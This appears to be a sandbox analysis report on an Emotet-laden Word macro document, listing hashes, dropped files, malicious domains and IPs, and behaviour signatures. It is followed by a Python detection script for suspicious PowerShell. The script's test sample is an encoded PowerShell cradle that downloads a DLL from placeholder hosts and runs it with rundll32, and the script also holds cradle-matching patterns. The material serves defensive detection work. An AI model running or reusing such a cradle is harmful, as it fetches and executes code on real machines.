Version: 31.0.0 Red Diamond
IR
Analysis ID: 337085
Product: CloudBasic
Time: 18:35:17
Date: 07/01/2021
Sample: Bestand.doc
Cookbook: defaultwindowsofficecookbook.jbs
Analysis system: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Platform: WINDOWS
MD5: 64553aae596a4b3177964c3bac7502eb
SHA1: 9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
SHA256: 05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f
File type: Microsoft Word document (32009/1) 79.99%
Detection: malicious: true, suspicious: false, clean: false, unknown: false
Score: 100 (range 0-100)
Confidence: 5 (range 0-5)
false
Files created or modified during analysis (path, malicious flag, MD5, SHA1, SHA256):

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmp
  malicious: false
  MD5: 5D4D94EE7E06BBB0AF9584119797B23A
  SHA1: DBB111419C704F116EFA8E72471DD83E86E49677
  SHA256: 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
  malicious: false
  MD5: 3B7B4F5326139F48EFA0AAE509E2FE58
  SHA1: 209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
  SHA256: D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bestand.LNK
  malicious: false
  MD5: 3E9F0F87D8B31070B39E2755FBF0A3C5
  SHA1: 2DB1EDA1104A69FB283E1681C32B552E22EEA3FD
  SHA256: 708FFE01FFA85316F7E0B238F1A2479CED34796F19DF08946C9A7ECAB06C73C7

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
  malicious: false
  MD5: 5A1F1D8C9E6C6E24A01B52F5F2834005
  SHA1: 5670FB6B5EA66B2BF15329B232C1628566625A92
  SHA256: 9D3FAE6D0BDDB4CFC66E3542A4B42782E352C0A5F1BDB1999CCC5C59B9BCFC68

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
  malicious: false
  MD5: 39EB3053A717C25AF84D576F6B2EBDD2
  SHA1: F6157079187E865C1BAADCC2014EF58440D449CA
  SHA256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T34CJE67ZJGLFSV18T6Q.temp
  malicious: false
  MD5: 1A838ABB3A40279F383AB1C21E56F683
  SHA1: 27A1DA6BA86FA744C3CC8F3D2FFFDBEC7CFFD703
  SHA256: 5A663A1A8212AA670A701C2822949796FCAAC0AADC313CCD72E8AB09820FD5F3

C:\Users\user\Desktop\~$estand.doc
  malicious: false
  MD5: 39EB3053A717C25AF84D576F6B2EBDD2
  SHA1: F6157079187E865C1BAADCC2014EF58440D449CA
  SHA256: CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A

C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll
  malicious: false
  MD5: 1C6DB931E1A9E52F74433510909ED133
  SHA1: B8D72335A962827DD6DB2912ECF0FC6DC56AABD8
  SHA256: A39809D9A9B1DA262E89F785721DB56192DE84327342F98463761F30E17B5A52
Contacted IP addresses:
89.252.164.58
173.255.195.246
5.2.136.90
103.92.235.25
66.153.205.191

Resolved domains (name, malicious flag, IP):
sarture.com  malicious: true  173.255.195.246
hangarlastik.com  malicious: true  89.252.164.58
seo.udaipurkart.com  malicious: true  103.92.235.25
padreescapes.com  malicious: true  66.153.205.191

No resolved domain is listed for 5.2.136.90.
Signatures:

Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet
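The PowerShell-related signatures above (encrypted command-line option, case anomaly, very long command line, process creation via WMI, dropper URLs in PowerShell memory) are the ones a detection engineer would want to reproduce over endpoint telemetry. The following Python is an added example, not part of this report and not Joe Sandbox's own logic: it decodes a -EncodedCommand payload, flags unusual casing of known PowerShell tokens, checks command-line length, looks for download cradles and URLs in the decoded script, and treats WmiPrvSE.exe as the parent that marks a process created through WMI. The two events are constructed (Sysmon event 1 field names, an 800-character length threshold and the reserved example.invalid domain are all assumptions made for the example, not values from the analysis).

```python
"""Heuristic triage of process-creation events for the PowerShell behaviours
listed in the sandbox signatures.  Added example; events are constructed."""

import base64
import binascii
import re

# Illustrative threshold (an assumption, not the sandbox's own value).
LONG_CMDLINE = 800

# powershell.exe accepts any prefix of -EncodedCommand, plus the -ec alias.
_ENC_ALIASES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"},
                      key=len, reverse=True)
_ENC_RE = re.compile(r"(?i)(?:^|\s)[-/](?:%s)\s+([A-Za-z0-9+/=]{20,})"
                     % "|".join(_ENC_ALIASES))

# Canonical spellings; all-lower and all-upper variants are also accepted.
_CANON = ["PowerShell", "Powershell", "NoProfile", "NonInteractive", "NoLogo",
          "NoExit", "WindowStyle", "Hidden", "ExecutionPolicy", "Bypass",
          "Unrestricted", "EncodedCommand", "Command", "File", "Sta", "Mta"]

_CRADLE_RE = re.compile(r"(?i)Net\.WebClient|Download(?:File|String)|"
                        r"Invoke-WebRequest|\biwr\b|Invoke-Expression|\biex\b|"
                        r"rundll32|regsvr32|Start-Process")
_URL_RE = re.compile(r"(?i)https?://[^\s'\"]+")


def decode_encoded_command(cmdline):
    """Return the UTF-16LE script behind -enc/-EncodedCommand, or None."""
    m = _ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def _odd_case(word):
    """True if word is a known PowerShell token written in unusual casing."""
    if word.islower() or word.isupper():
        return False
    if any(c.startswith(word) for c in _CANON):   # e.g. -NoP, -Exec are fine
        return False
    return any(c.lower().startswith(word.lower()) for c in _CANON)


def case_anomaly(cmdline):
    """Flag tokens such as pOwErShElL, -eNc or hIdDeN (base64 blobs are skipped)."""
    for tok in cmdline.split():
        word = tok.strip('"').lstrip("-/").rsplit("\\", 1)[-1]
        if word.lower().endswith(".exe"):
            word = word[:-4]
        if re.fullmatch(r"[A-Za-z]{1,16}", word) and _odd_case(word):
            return True
    return False


def triage(event):
    """Return the sorted list of heuristic hits for one process-creation event."""
    cmd = event["CommandLine"]
    hits = set()
    script = decode_encoded_command(cmd)
    if script is not None:
        hits.add("encoded_command")
        if _URL_RE.search(script):
            hits.add("dropper_url")
        if _CRADLE_RE.search(script):
            hits.add("download_cradle")
    if case_anomaly(cmd):
        hits.add("case_anomaly")
    if len(cmd) > LONG_CMDLINE:
        hits.add("very_long_command_line")
    # Win32_Process.Create runs under the WMI provider host, so the parent is
    # WmiPrvSE.exe rather than the Office process that ran the macro.
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    if parent == "wmiprvse.exe":
        hits.add("spawned_via_wmi")
    return sorted(hits)


# Constructed sample: a download-and-rundll32 cradle encoded as UTF-16LE base64
# the way powershell.exe expects.  example.invalid is a placeholder domain.
SCRIPT = (
    "$u='http://example.invalid/a/','http://example.invalid/b/';"
    "$p=\"$env:USERPROFILE\\Lqpw_5i\\F4w0osc\\R95F.dll\";"
    "New-Item -ItemType Directory -Force (Split-Path $p)|Out-Null;"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "if((Get-Item $p).Length -gt 30000){rundll32 $p,Control_RunDLL;break}}catch{}}"
)
ENCODED = base64.b64encode(SCRIPT.encode("utf-16le")).decode("ascii")

EVENTS = [
    {   # macro-launched PowerShell whose parent is the WMI provider host
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
        "CommandLine": "pOwErShElL -NoP -w hIdDeN -eNc " + ENCODED,
    },
    {   # ordinary administrative script run from a shell
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "powershell.exe -NoProfile -ExecutionPolicy Bypass "
                       "-File C:\\Scripts\\backup.ps1",
    },
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(ev["ParentImage"].rsplit("\\", 1)[-1], "->", triage(ev) or "no hits")
```

The casing check deliberately compares against a short table of canonical spellings instead of counting case transitions, because legitimate abbreviations such as -NoP or -Exec mix case too; anything that is not a known token (including the base64 payload itself) is ignored. On real telemetry, feed it Sysmon event 1 records (or any source with image, parent image and command line) and treat the WMI-parent hit together with an encoded command as the high-confidence combination, since it matches the macro-to-WMI-to-PowerShell chain the signatures above describe.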